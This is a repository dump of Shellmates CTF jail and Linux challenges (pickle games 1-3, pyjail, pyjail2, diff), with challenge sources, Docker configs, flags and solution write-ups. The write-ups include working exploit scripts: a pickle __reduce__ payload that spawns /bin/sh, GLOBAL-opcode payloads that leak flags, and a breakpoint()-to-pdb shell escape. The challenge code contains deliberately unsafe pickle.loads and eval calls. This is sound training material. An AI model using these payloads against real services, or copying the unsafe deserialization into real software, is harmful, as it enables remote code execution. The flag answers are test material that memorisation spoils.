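    # Plain data still round-trips through the restricted loader.
    results["plain data"] = safe_loads(pickle.dumps({"scores": [1, 2, 3]}))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

If the service only ever needs plain data, a format without code references, such as JSON, removes the problem altogether.
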
17 | -------------------------------------------------------------------------------- /jail/pickle-games-1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pickle games 1" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: jail 6 | difficulty: easy 7 | 8 | description: | 9 | > Ever heard of the pickle games, they're very tasty! 10 | > Can you get RCE on the remote server? 11 | 12 | **Author** : chenx3n 13 | 14 | connection_info: ncat -v --ssl pickle-games-1.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/pickle-games-1:latest 17 | 18 | value: 500 19 | type: dynamic 20 | 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | flags: 27 | - shellmates{lEt_thE_piCkl3_gaMeS_BegiN!} 28 | 29 | tags: 30 | - easy 31 | 32 | files: 33 | - ./challenge/challenge.py 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /jail/pickle-games-1/challenge/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import pickle 4 | 5 | 6 | def check(data): 7 | return len(data) <= 400 8 | 9 | 10 | if __name__ == "__main__": 11 | print("Welcome to the pickle games! 
(Level 0)") 12 | data = bytes.fromhex(input("Enter your hex-encoded pickle data: ")) 13 | if check(data): 14 | result = pickle.loads(data) 15 | print(f"Result: {result}") 16 | else: 17 | print("Check failed :(") 18 | -------------------------------------------------------------------------------- /jail/pickle-games-1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/pickle-games-1/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{lEt_thE_piCkl3_gaMeS_BegiN!} -------------------------------------------------------------------------------- /jail/pickle-games-1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 
7 | ports: 8 | - '1337:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /jail/pickle-games-1/solution/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 1 2 | 3 | ## Write-up 4 | 5 | Input is not filtered at all, we can send a classic pickle RCE payload: 6 | 7 | ```python 8 | #!/usr/bin/env python3 9 | 10 | from pwn import * 11 | import pickle 12 | 13 | HOST, PORT, SSL = "pickle-games-1.challs.shellmates.club", 443, True 14 | 15 | class RCE: 16 | def __reduce__(self): 17 | return os.system, ("/bin/sh",) 18 | 19 | if __name__ == "__main__": 20 | io = remote(HOST, PORT, ssl=SSL) 21 | rce = RCE() 22 | payload = pickle.dumps(rce) 23 | data = payload.hex() 24 | io.recvuntil(b"data: ") 25 | io.sendline(data) 26 | io.sendline(b"id") 27 | io.sendline(b"cat flag.txt") 28 | io.interactive() 29 | ``` 30 | 31 | [solve.py](solve.py) 32 | 33 | -------------------------------------------------------------------------------- /jail/pickle-games-1/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import pickle 5 | 6 | HOST, PORT, SSL = "pickle-games-1.challs.shellmates.club", 443, True 7 | 8 | class RCE: 9 | def __reduce__(self): 10 | return os.system, ("/bin/sh",) 11 | 12 | if __name__ == "__main__": 13 | io = remote(HOST, PORT, ssl=SSL) 14 | rce = RCE() 15 | payload = pickle.dumps(rce) 16 | data = payload.hex() 17 | io.recvuntil(b"data: ") 18 | io.sendline(data) 19 | io.sendline(b"id") 20 | io.sendline(b"cat flag.txt") 21 | io.interactive() 22 | -------------------------------------------------------------------------------- 
/jail/pickle-games-2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x challenge.py entrypoint.sh 13 | 14 | EXPOSE 1337 15 | 16 | ENTRYPOINT ["./entrypoint.sh"] 17 | -------------------------------------------------------------------------------- /jail/pickle-games-2/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 2 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > I bet the first one was pretty easy after understanding what pickle is. 8 | > But now that I REDUCEd the inputs allowed, can you still reach the `FLAG` variable? 9 | 10 | **Connect with** : ncat -v --ssl pickle-games-2.challs.shellmates.club 443 11 | 12 | [challenge.py](./challenge/challenge.py) 13 | 14 | ## Solution 15 | 16 | Solution of the challenge can be found [here](solution/). 17 | -------------------------------------------------------------------------------- /jail/pickle-games-2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pickle games 2" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: jail 6 | difficulty: medium 7 | 8 | description: | 9 | > I bet the first one was pretty easy after understanding what pickle is. 10 | > But now that I REDUCEd the inputs allowed, can you still reach the `FLAG` variable? 
11 | 12 | **Author** : chenx3n 13 | 14 | connection_info: ncat -v --ssl pickle-games-2.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/pickle-games-2:latest 17 | 18 | value: 500 19 | type: dynamic 20 | 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | flags: 27 | - shellmates{No_RedUC1Ng_N3ED3d} 28 | 29 | tags: 30 | - medium 31 | 32 | files: 33 | - ./challenge/challenge.py 34 | 35 | requirements: 36 | - "pickle games 1" 37 | 38 | state: visible 39 | 40 | version: "0.1" 41 | -------------------------------------------------------------------------------- /jail/pickle-games-2/challenge/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import pickle 4 | import pickletools 5 | 6 | from flag import FLAG 7 | 8 | 9 | def check(data): 10 | return len(data) <= 400 and all( 11 | opcode.code.encode() != pickle.REDUCE 12 | for opcode, _, _ in pickletools.genops(data) 13 | ) 14 | 15 | 16 | if __name__ == "__main__": 17 | print("Welcome to the pickle games! 
(Level 1)") 18 | data = bytes.fromhex(input("Enter your hex-encoded pickle data: ")) 19 | if check(data): 20 | result = pickle.loads(data) 21 | print(f"Result: {result}") 22 | else: 23 | print("Check failed :(") 24 | -------------------------------------------------------------------------------- /jail/pickle-games-2/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/pickle-games-2/challenge/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = "shellmates{No_RedUC1Ng_N3ED3d}" -------------------------------------------------------------------------------- /jail/pickle-games-2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1351:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /jail/pickle-games-2/solution/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 2 2 | 3 | ## Write-up 4 | 5 | `REDUCE` opcode is filtered, which means we cannot execute functions. 
6 | Though since the flag is being imported, we can just load it with the `GLOBAL` opcode using this payload: 7 | 8 | ```python 9 | pickle.PROTO + b"\x04" + \ 10 | pickle.GLOBAL + b"__main__\nFLAG\n" + \ 11 | pickle.STOP 12 | ``` 13 | 14 | Full exploit script: 15 | 16 | ```python 17 | #!/usr/bin/env python3 18 | 19 | from pwn import * 20 | import pickle 21 | 22 | HOST, PORT, SSL = "pickle-games-2.challs.shellmates.club", 443, True 23 | 24 | PAYLOAD = flat( 25 | pickle.PROTO + b"\x04", 26 | pickle.GLOBAL + b"__main__\nFLAG\n", 27 | pickle.STOP, 28 | ) 29 | 30 | if __name__ == "__main__": 31 | io = remote(HOST, PORT, ssl=SSL) 32 | data = PAYLOAD.hex().encode() 33 | io.recvuntil(b"data: ") 34 | io.sendline(data) 35 | io.interactive() 36 | ``` 37 | 38 | [solve.py](solve.py) 39 | 40 | -------------------------------------------------------------------------------- /jail/pickle-games-2/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import pickle 5 | 6 | HOST, PORT, SSL = "pickle-games-2.challs.shellmates.club", 443, True 7 | 8 | PAYLOAD = flat( 9 | pickle.PROTO + b"\x04", 10 | pickle.GLOBAL + b"__main__\nFLAG\n", 11 | pickle.STOP, 12 | ) 13 | 14 | if __name__ == "__main__": 15 | io = remote(HOST, PORT, ssl=SSL) 16 | data = PAYLOAD.hex().encode() 17 | io.recvuntil(b"data: ") 18 | io.sendline(data) 19 | io.interactive() 20 | -------------------------------------------------------------------------------- /jail/pickle-games-3/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x challenge.py entrypoint.sh 13 | 14 | EXPOSE 1337 15 | 16 | ENTRYPOINT ["./entrypoint.sh"] 17 | 
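Added example (not part of the repository): the `check()` from pickle-games-2 set beside an allowlisting `find_class` override, to show why filtering the `REDUCE` opcode does not stop global lookups while a per-lookup allowlist does. The `demo_app` module, its placeholder `FLAG`, the `ALLOWED` set and the helper names are assumptions made so the block runs offline; it also goes one step beyond the write-up by covering `STACK_GLOBAL`, the opcode pickle itself emits for the same lookup at protocol 4.

```python
#!/usr/bin/env python3
import io
import pickle
import pickletools
import sys
import types

# Constructed stand-in for the challenge's __main__ module and its FLAG variable.
demo_app = types.ModuleType("demo_app")
demo_app.FLAG = "flag{constructed-placeholder}"
sys.modules["demo_app"] = demo_app


def opcode_filter(data: bytes) -> bool:
    """Same logic as check() in pickle-games-2: size cap and no REDUCE opcode."""
    return len(data) <= 400 and all(
        opcode.code.encode() != pickle.REDUCE
        for opcode, _, _ in pickletools.genops(data)
    )


# Payload shape from the write-up, pointed at the stand-in module.
GLOBAL_PAYLOAD = (
    pickle.PROTO + b"\x04"
    + pickle.GLOBAL + b"demo_app\nFLAG\n"
    + pickle.STOP
)

# A reference to a module-level object as pickle emits it at protocol 4:
# STACK_GLOBAL instead of GLOBAL, and still no REDUCE anywhere in the stream.
STACK_GLOBAL_PAYLOAD = pickle.dumps(len, protocol=4)


class AllowlistUnpickler(pickle.Unpickler):
    """Refuse every global lookup that is not explicitly allowlisted.

    GLOBAL and STACK_GLOBAL both resolve names through find_class(), so one
    hook covers both opcodes, whatever else the stream contains.
    """

    # Hypothetical allowlist: the only class this application expects to load.
    ALLOWED = frozenset({("collections", "OrderedDict")})

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")
        return super().find_class(module, name)


def safe_loads(data: bytes):
    """Drop-in replacement for pickle.loads() that enforces the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


def compare(data: bytes) -> dict:
    """Run the same bytes through both defences and report what each decided."""
    report = {"opcode_filter_passes": opcode_filter(data)}
    try:
        safe_loads(data)
        report["allowlist_unpickler"] = "loaded"
    except pickle.UnpicklingError as exc:
        report["allowlist_unpickler"] = f"rejected: {exc}"
    return report


if __name__ == "__main__":
    samples = {
        "GLOBAL (write-up shape)": GLOBAL_PAYLOAD,
        "STACK_GLOBAL (pickle.dumps(len))": STACK_GLOBAL_PAYLOAD,
        "plain data": pickle.dumps({"user": "alice", "roles": ["reader"]}),
    }
    for label, blob in samples.items():
        print(f"{label}: {compare(blob)}")
    # The unrestricted loader hands back the module attribute untouched.
    print("pickle.loads on GLOBAL payload ->", pickle.loads(GLOBAL_PAYLOAD))
```

The allowlist only limits which names can be resolved; data from an untrusted peer is still better carried in a format that cannot name code at all, such as JSON.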
-------------------------------------------------------------------------------- /jail/pickle-games-3/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 3 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Things are getting a little more serious now. 8 | > Can you find a way to escape this pickle! 9 | 10 | **Connect with** : ncat -v --ssl pickle-games-3.challs.shellmates.club 443 11 | 12 | [challenge.py](./challenge/challenge.py) 13 | 14 | ## Solution 15 | 16 | Solution of the challenge can be found [here](solution/). 17 | -------------------------------------------------------------------------------- /jail/pickle-games-3/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pickle games 3" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: jail 6 | difficulty: medhard 7 | 8 | description: | 9 | > Things are getting a little more serious now. 10 | > Can you find a way to escape this pickle! 
11 | 12 | **Author** : chenx3n 13 | 14 | connection_info: ncat -v --ssl pickle-games-3.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/pickle-games-3:latest 17 | 18 | value: 500 19 | type: dynamic 20 | 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | flags: 27 | - shellmates{Y0ur3_g3Tt1Ng_g0od_at_tHIs_But_CaN_yOU_$0lv3_tHe_fiNAl_G4me?} 28 | 29 | tags: 30 | - medium/hard 31 | 32 | files: 33 | - ./challenge/challenge.py 34 | 35 | requirements: 36 | - "pickle games 2" 37 | 38 | state: visible 39 | 40 | version: "0.1" 41 | -------------------------------------------------------------------------------- /jail/pickle-games-3/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/pickle-games-3/challenge/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = "shellmates{Y0ur3_g3Tt1Ng_g0od_at_tHIs_But_CaN_yOU_$0lv3_tHe_fiNAl_G4me?}" 2 | -------------------------------------------------------------------------------- /jail/pickle-games-3/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 
7 | ports: 8 | - '1352:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /jail/pickle-games-3/solution/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 3 2 | 3 | ## Write-up 4 | 5 | ```python 6 | pickle.PROTO + b"\x04" + \ 7 | pickle.GLOBAL + b"__main__\nEmpty.__getattribute__\n", 8 | pickle.GLOBAL + b"__main__\nflagObj\n", 9 | pickle.UNICODE + b"flag\n", 10 | pickle.TUPLE2, 11 | pickle.REDUCE, 12 | pickle.STOP, 13 | ``` 14 | 15 | Full exploit script: 16 | 17 | ```python 18 | #!/usr/bin/env python3 19 | 20 | from pwn import * 21 | import pickle 22 | 23 | HOST, PORT, SSL = "pickle-games-3.challs.shellmates.club", 443, True 24 | 25 | PAYLOAD = flat( 26 | pickle.PROTO + b"\x04", 27 | pickle.GLOBAL + b"__main__\nEmpty.__getattribute__\n", 28 | pickle.GLOBAL + b"__main__\nflagObj\n", 29 | pickle.UNICODE + b"flag\n", 30 | pickle.TUPLE2, 31 | pickle.REDUCE, 32 | pickle.STOP, 33 | ) 34 | 35 | if __name__ == "__main__": 36 | io = remote(HOST, PORT, ssl=SSL) 37 | data = PAYLOAD.hex().encode() 38 | io.recvuntil(b"data: ") 39 | io.sendline(data) 40 | io.interactive() 41 | ``` 42 | 43 | [solve.py](solve.py) 44 | 45 | -------------------------------------------------------------------------------- /jail/pickle-games-3/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import pickle 5 | 6 | HOST, PORT, SSL = "pickle-games-3.challs.shellmates.club", 443, True 7 | 8 | PAYLOAD = flat( 9 | pickle.PROTO + b"\x04", 10 | pickle.GLOBAL + b"__main__\nEmpty.__getattribute__\n", 11 | pickle.GLOBAL + b"__main__\nflagObj\n", 12 | pickle.UNICODE + 
b"flag\n", 13 | pickle.TUPLE2, 14 | pickle.REDUCE, 15 | pickle.STOP, 16 | ) 17 | 18 | if __name__ == "__main__": 19 | io = remote(HOST, PORT, ssl=SSL) 20 | data = PAYLOAD.hex().encode() 21 | io.recvuntil(b"data: ") 22 | io.sendline(data) 23 | io.interactive() 24 | -------------------------------------------------------------------------------- /jail/pyjail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-slim-buster 2 | 3 | RUN apt-get update \ 4 | && apt-get install -y socat 5 | 6 | COPY challenge /challenge 7 | 8 | RUN chmod 700 /tmp 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x entrypoint.sh challenge.py 13 | 14 | EXPOSE 1337 15 | 16 | ENTRYPOINT ["/challenge/entrypoint.sh"] 17 | -------------------------------------------------------------------------------- /jail/pyjail/README.md: -------------------------------------------------------------------------------- 1 | # pyjail 2 | 3 | **`Author:`** [1m4D](https://github.com/imadbourouche) 4 | 5 | ## Description 6 | 7 | > I filtered everything in my python interpreter, Can you get a shell ? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /jail/pyjail/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pyjail" 2 | author: "1m4D" 3 | author_link: "https://github.com/imadbourouche" 4 | 5 | category: jail 6 | difficulty: medium 7 | 8 | description: | 9 | > I filtered everything in my python interpreter, Can you get a shell ? 
10 | 11 | **Author** : 1m4D 12 | 13 | connection_info: ncat -v --ssl pyjail.challs.shellmates.club 443 14 | 15 | image: gcr.io/glowing-reserve-336013/pyjail 16 | 17 | flags: 18 | - shellmates{BR3kP01nT_BuiLT1N_D0_M4g1C_98765} 19 | 20 | files: 21 | - ./challenge/challenge.py 22 | 23 | tags: 24 | - medium 25 | 26 | value: 500 27 | type: dynamic 28 | extra: 29 | initial: 500 30 | decay: 15 31 | minimum: 50 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /jail/pyjail/challenge/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | BLACKLIST="!\"#$%&'*+,-./0123456789:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c" 5 | while 1: 6 | exp=input('>>> ') 7 | check1 = all(ord(i)<127 for i in exp) 8 | check2 = all(i not in exp for i in BLACKLIST) 9 | check3 = exp.find('input')+exp.find('eval')+exp.find('exec') 10 | if check1 and check2 and check3==-3: 11 | try: 12 | eval(exp) 13 | except Exception as e: 14 | print(e) 15 | else: 16 | print('BAD!') 17 | -------------------------------------------------------------------------------- /jail/pyjail/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="nobody" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive,su="$USER" exec:"$EXEC",stderr 8 | -------------------------------------------------------------------------------- /jail/pyjail/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{BR3kP01nT_BuiLT1N_D0_M4g1C_98765} 2 | -------------------------------------------------------------------------------- /jail/pyjail/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 
5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /jail/pyjail/solution/README.md: -------------------------------------------------------------------------------- 1 | # pyjail 2 | 3 | ## Write-up 4 | 5 | - The `breakpoint()` builtin in Python opens pdb, the Python debugger, which is also an interpreter 6 | 7 | ``` 8 | ~ nc localhost 1337 9 | >>> breakpoint() 10 | --Return-- 11 | > <string>(1)<module>()->None 12 | (Pdb) import os 13 | (Pdb) os.system("sh") 14 | ls 15 | entrypoint.sh 16 | flag.txt 17 | script.py 18 | cat flag.txt 19 | shellmates{BR3kP01nT_BuiLT1N_D0_M4g1C_98765} 20 | ``` 21 | 22 | ## Flag 23 | `shellmates{BR3kP01nT_BuiLT1N_D0_M4g1C_98765}` 24 | -------------------------------------------------------------------------------- /jail/pyjail2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server sudo systemd rsyslog 5 | 6 | RUN useradd -M -s /bin/bash ctf-cracked \ 7 | && useradd -M -s /bin/bash ctf \ 8 | && echo 'ctf:ctf' | chpasswd \ 9 | && usermod -aG sudo ctf 10 | 11 | COPY challenge/flag.txt / 12 | COPY challenge/sudoers /etc/sudoers 13 | COPY challenge/sshd_config /etc/ssh/sshd_config 14 | COPY challenge/chall.py /chall.py 15 | 16 | RUN chown root:ctf-cracked /flag.txt \ 17 | && chmod 440 /flag.txt \ 18 | && chmod +x /chall.py 19 | 20 | RUN chmod 770 /tmp /var/tmp 21 | 22 | ENTRYPOINT service rsyslog start \ 23 | && service ssh start \ 24 | && tail -f --retry -------------------------------------------------------------------------------- /jail/pyjail2/README.md: 
-------------------------------------------------------------------------------- 1 | # pyjail2 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > I filtered everything in my python interpreter, Can you get a shell ? 8 | > Again? 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /jail/pyjail2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pyjail2" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: jail 6 | difficulty: hard 7 | 8 | description: | 9 | > I filtered everything in my python interpreter, Can you get a shell ? 10 | > Again? 11 | 12 | **Password** : ctf 13 | 14 | **Author** : Ouxs 15 | 16 | connection_info: ssh ctf@pyjail2 -o ProxyCommand="openssl s_client -quiet -connect pyjail2.challs.shellmates.club:443 -servername pyjail2.challs.shellmates.club" 17 | 18 | image: gcr.io/glowing-reserve-336013/pyjail2 19 | 20 | requirements: 21 | - "pyjail" 22 | 23 | flags: 24 | - shellmates{I7's_4ll_4b0U7_PYYYYY_SKILZZZ} 25 | 26 | files: 27 | - challenge/chall.py 28 | 29 | tags: 30 | - hard 31 | 32 | value: 500 33 | type: dynamic 34 | extra: 35 | initial: 500 36 | decay: 15 37 | minimum: 50 38 | 39 | state: visible 40 | version: "0.1" -------------------------------------------------------------------------------- /jail/pyjail2/challenge/chall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | WHITELIST = 'abcdefghijklmnopqrstuvwxyz()' 4 | NOT_ALLOWED_FUNCTIONS = ['input', 'exec', 'eval', 'breakpoint', 'help'] 5 | 6 | while True: 7 | expr = input("[ EVAL THIS FOR ME ] --> ") 8 | if any(char not in WHITELIST for char in expr ) or any(forbid in expr for forbid in NOT_ALLOWED_FUNCTIONS): 9 | print("NOPE!") 10 | else : 11 | if expr == "exit()" : exit() 12 | 
try : 13 | eval(expr) 14 | except : 15 | print("Don't break it please.") 16 | 17 | 18 | -------------------------------------------------------------------------------- /jail/pyjail2/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{I7's_4ll_4b0U7_PYYYYY_SKILZZZ} 2 | -------------------------------------------------------------------------------- /jail/pyjail2/challenge/sudoers: -------------------------------------------------------------------------------- 1 | # 2 | # This file MUST be edited with the 'visudo' command as root. 3 | # 4 | # Please consider adding local content in /etc/sudoers.d/ instead of 5 | # directly modifying this file. 6 | # 7 | # See the man page for details on how to write a sudoers file. 8 | # 9 | Defaults env_reset 10 | Defaults mail_badpass 11 | Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" 12 | 13 | # Host alias specification 14 | 15 | # User alias specification 16 | 17 | # Cmnd alias specification 18 | 19 | # User privilege specification 20 | root ALL=(ALL:ALL) ALL 21 | 22 | 23 | # See sudoers(5) for more information on "#include" directives: 24 | 25 | #includedir /etc/sudoers.d 26 | ctf ALL=(ctf-cracked:ctf-cracked) /chall.py 27 | -------------------------------------------------------------------------------- /jail/pyjail2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 
7 | ports: 8 | - '1337:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:22 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /linux/README.md: -------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | This directory contains challenges related to the `Linux` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /linux/diff/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server sudo systemd rsyslog 5 | 6 | RUN useradd -M -s /bin/bash ctf-cracked \ 7 | && useradd -M -s /bin/bash ctf \ 8 | && echo 'ctf:ctf' | chpasswd \ 9 | && usermod -aG sudo ctf 10 | 11 | COPY challenge/flag.txt / 12 | COPY challenge/sudoers /etc/sudoers 13 | COPY challenge/sshd_config /etc/ssh/sshd_config 14 | 15 | RUN chown root:ctf-cracked /flag.txt \ 16 | && chmod 440 /flag.txt 17 | 18 | RUN chmod 770 /tmp /var/tmp 19 | 20 | ENTRYPOINT service rsyslog start \ 21 | && service ssh start \ 22 | && tail -f --retry -------------------------------------------------------------------------------- /linux/diff/README.md: -------------------------------------------------------------------------------- 1 | # diff 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > He is offering a great tool, if you only knew how to use it. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 
-------------------------------------------------------------------------------- /linux/diff/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "diff" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: linux 6 | difficulty: easy 7 | 8 | description: | 9 | > He is offering a great tool, if you only knew how to use it. 10 | 11 | **Password** : ctf 12 | **Author** : Ouxs 13 | 14 | connection_info: ssh ctf@diff -o ProxyCommand="openssl s_client -quiet -connect diff.challs.shellmates.club:443 -servername diff.challs.shellmates.club" 15 | 16 | image: gcr.io/glowing-reserve-336013/diff 17 | 18 | flags: 19 | - shellmates{You_ma$tered_th3_t00L} 20 | 21 | tags: 22 | - easy 23 | 24 | value: 500 25 | type: dynamic 26 | extra: 27 | initial: 500 28 | decay: 15 29 | minimum: 50 30 | 31 | state: visible 32 | version: "0.1" -------------------------------------------------------------------------------- /linux/diff/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{You_ma$tered_th3_t00L} 2 | -------------------------------------------------------------------------------- /linux/diff/challenge/sudoers: -------------------------------------------------------------------------------- 1 | # 2 | # This file MUST be edited with the 'visudo' command as root. 3 | # 4 | # Please consider adding local content in /etc/sudoers.d/ instead of 5 | # directly modifying this file. 6 | # 7 | # See the man page for details on how to write a sudoers file. 
8 | # 9 | Defaults env_reset 10 | Defaults mail_badpass 11 | Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" 12 | 13 | # Host alias specification 14 | 15 | # User alias specification 16 | 17 | # Cmnd alias specification 18 | 19 | # User privilege specification 20 | root ALL=(ALL:ALL) ALL 21 | 22 | 23 | # See sudoers(5) for more information on "#include" directives: 24 | 25 | #includedir /etc/sudoers.d 26 | ctf ALL=(ctf-cracked:ctf-cracked) /usr/bin/diff 27 | -------------------------------------------------------------------------------- /linux/diff/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1337:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | -------------------------------------------------------------------------------- /linux/diff/solution/README.md: -------------------------------------------------------------------------------- 1 | # diff 2 | 3 | ## Write-up 4 | 5 | After accessing the system, we can see that the *flag.txt* file can only be read by the `root` user and the `ctf-cracked` group. 6 | By executing 